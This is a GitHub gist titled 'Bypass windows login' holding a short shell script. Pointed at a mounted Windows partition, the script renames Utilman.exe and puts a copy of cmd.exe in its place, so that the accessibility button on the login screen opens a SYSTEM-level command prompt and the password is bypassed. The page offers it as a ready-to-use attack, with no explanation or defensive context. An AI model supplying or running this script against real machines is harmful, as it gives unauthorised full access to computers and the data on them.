Skip to content

Instantly share code, notes, and snippets.

@mo9a7i
Created April 12, 2023 19:09
Show Gist options
  • Save mo9a7i/59bb06aaf8aa2252dc5faf8378468b50 to your computer and use it in GitHub Desktop.
Save mo9a7i/59bb06aaf8aa2252dc5faf8378468b50 to your computer and use it in GitHub Desktop.
Bypass windows login
windows_part=$1
cd $windows_part/Windows/System32
mv Utilman.exe Utilman.exe.d
cp cmd.exe Utilman.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment